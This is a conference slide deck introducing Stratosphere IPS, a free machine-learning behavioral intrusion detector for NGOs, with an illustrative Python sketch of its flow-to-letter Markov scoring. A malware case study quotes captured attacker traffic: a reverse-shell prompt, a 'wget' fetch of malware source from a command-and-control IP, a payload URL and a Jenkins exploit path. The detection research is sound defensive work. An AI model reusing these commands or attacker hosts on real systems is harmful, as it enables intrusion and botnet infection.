Stratosphere IPS

The free machine learning malware detection for the community

Sebastian Garcia - CTU University, Prague

@eldracote

sebastian.garcia@agents.fel.cvut.cz

https://stratosphereips.org

Live Slides: bit.ly/ekoparty2016

NGOs are at risk

Problems in NGOs Security

  • Highly political targets.

  • Attacked by powerful actors

  • No resources.

  • Not their goal.

  • Strong concerns about their privacy.

  • Concerns about Trust.

Stratosphere IPS

Free Software. Machine Learning. Behavioral IPS. Protecting NGOs.

Stratosphere Goals

  • To put machine learning techniques in the hands of the civil society.

  • To offer this detection service to NGOs for free.

  • To focus on what computers are doing, not the attacks they receive.

Stratosphere Tech Principles

  • Less is More

    • Analyze the behavior of groups of flows.

  • Disassociate

    • Representation of behavior from detection.

  • Verify

    • With real and labeled datasets.

About Behaviors

  • Your behavior is usually the same when connecting with the same service.

  • Group flows going to a specific service by ignoring the source port. We call it a connection.

  • The connection, composed of several flows, now shows a behavior in time.

Network Behaviors

  • Model network behaviors as a string of letters.

  • 1 flow → 3 features → 1 letter

Malware Behaviors

  • Malware mostly generates the same behaviors.

  • Changing the behavior is costly for the attacker.

  • These behaviors do not expire quickly.


Behavior of Connections

Markov Chains Models

  • Create, train and store Markov Chain models.

Behavioral Detection

Trained Markov Models: similarity to unknown traffic.
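As an added illustration of the pipeline on these slides (flows grouped into a connection, one letter per flow from three features, a Markov chain trained on known behavior and compared with unknown traffic), this is example code, not the Stratosphere project's own implementation. The letter table, bucket edges, flow field names, the 10% periodicity tolerance, the threshold and the sample flows are constructed assumptions; the real Stratosphere encoding differs in detail.

```python
import math
from collections import defaultdict

# Constructed, simplified encoding modelled on the slides' scheme (an assumption, not the
# project's own table): periodicity, size and duration give one letter per flow, and a
# separator symbol before each letter encodes the time gap to the previous flow.
SIZE_EDGES, DUR_EDGES = (250, 1100), (0.1, 10.0)        # bytes and seconds: 3 buckets each
GAPS = ((5, '.'), (60, ','), (300, '+'), (3600, '*'))   # gap in seconds; longer gaps -> '0'
ALPHABET = '123456789abcdefghiABCDEFGHI.,+*0'

def bucket(value, edges):
    return sum(value >= e for e in edges)                # 0 = small/short ... 2 = large/long

def letters(flows):
    """Behaviour string of one connection: its time-ordered flows to one (dst, dport, proto),
    whatever source port each flow used."""
    out, prev_t, prev_gap = '', None, None
    for f in flows:
        idx = 3 * bucket(f['bytes'], SIZE_EDGES) + bucket(f['dur'], DUR_EDGES) + 1
        gap = None if prev_t is None else f['t'] - prev_t
        if gap is not None:
            out += next((sym for limit, sym in GAPS if gap < limit), '0')
        if prev_gap is None:                             # first flows: periodicity unknown
            out += str(idx)
        else:                                            # periodic when the gap stays stable
            out += chr(ord('a' if abs(gap - prev_gap) <= 0.1 * prev_gap else 'A') + idx - 1)
        prev_t, prev_gap = f['t'], gap
    return out

def train(strings):                                      # first-order Markov chain
    model = defaultdict(lambda: defaultdict(int))
    for s in strings:
        for a, b in zip(s, s[1:]):
            model[a][b] += 1
    return model

def similarity(model, s):                                # mean log P(transition), add-one smoothed
    total = 0.0
    for a, b in zip(s, s[1:]):
        row = model.get(a, {})
        total += math.log((row.get(b, 0) + 1) / (sum(row.values()) + len(ALPHABET)))
    return total / max(len(s) - 1, 1)

def constructed_flows(n, gap, nbytes, dur, jitter=0.0):  # constructed sample flows, not real traffic
    return [{'src': '10.0.0.5', 'dst': '203.0.113.9', 'dport': 25000, 'proto': 'tcp',
             'sport': 40000 + i, 't': i * gap + (jitter if i % 2 else 0.0),
             'bytes': nbytes, 'dur': dur} for i in range(n)]

# Model of one known C&C-like connection: periodic, large flows of medium duration.
MODEL = train([letters(constructed_flows(30, 20.0, 1500, 2.0))])
```

A string scoring above a chosen threshold (about -1.5 per transition with this toy alphabet) is reported as similar to the trained behavior; the first two letters stay digits because periodicity needs two gaps to judge.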

Real Detection Example

Example Detection

  • January 18th, 2016.

  • Got an alert from a malicious behavior.

147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,

"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."

The Detected Connection

Sent: "+.............P.43.249.81.135.......?."
Recv once:  "import time as O000OO0O0O00OO00O"

  • 43.249.81.135

    • No VirusTotal detection.

    • AS58879 Shanghai Anchang Network Security Technology Co.,L. China.

    • Last known domain: lyzqmir2.com. Minecraft server.

The Beginning

  • 103.242.134.118 port 33333/TCP [VT:7]

    • S:"/bin/sh: 0: can't access tty; job control turned off.$,"

    • S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$"

    • S:"wget 23.247.5.27:435/abcc.c"

  • 23.247.5.27 port 25000/TCP (main CC)

    • "=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

  • Python Script (deobfuscated by Veronica Valeros, thanks!)

    • "http://222.179.116.23:8080/theme/1/pys.py"

Is it Attacking?

  • Hundreds of connections to IPs in China, port 80/UDP.

  • 115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]

    • A few KB of binary data sent.

    • No apparent explanation.

The Attack Conclusion

  • Strange POSTs to Jenkins minutes before

    • POST /jenkins/descriptor/hudson.model.DownloadService/...

  • Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.

  • C&C channel with 10s timeouts.

  • Receives orders and executes OS commands.

  • Function to send random UDP data to IPs.

  • Similar to the BillGates botnet, but not quite the same.

What to do with this?

Stratosphere Data Analysis Service

Stratosphere Data Analysis

  • Cloud-based detection service for NGOs.

  • Add new algorithms continually.

  • Update the models.

  • Verify the detections if necessary.


  • We sign NDAs; NGOs can send the flows or only the letters! Privacy matters.

New Algorithms

  • Anomaly Detection

    • New feature in behavioral letters.

  • Malicious HTTPs detection.

  • Graph Analysis of sequential connections.

  • WHOIS similarity grouping.

  • P2P behavior

  • Behavioral Patterns of the Host.

Example of Graph Analysis

Organizations working with us

  • People In Need. CZ. Helping 22 countries. Human-rights, war, etc.

  • CZ.NIC. Manager of .cz and Turris Project. 2,000 Internet Networks.

  • ICT help for policy makers in 20 African Countries

  • CTU University. With more than 7,000 hosts.

Want to help NGOs?

  • Are you researching in network security?

  • Like network security analysis?

  • Know NGOs that are at risk in Latin America? Suggest them to us.

  • Know activists or journalists under attack? Tell us.

  • We are already working with researchers in Argentina. Help the project.

Conclusion

  • NGOs need our help.

  • Trust and openness are essential.

  • Continuous visibility and analysis are paramount.

  • Behavioral Machine Learning is improving.

Questions? And Thanks!

Sebastian Garcia 

eldraco@gmail.com

sebastian.garcia@agents.fel.cvut.cz

@eldracote
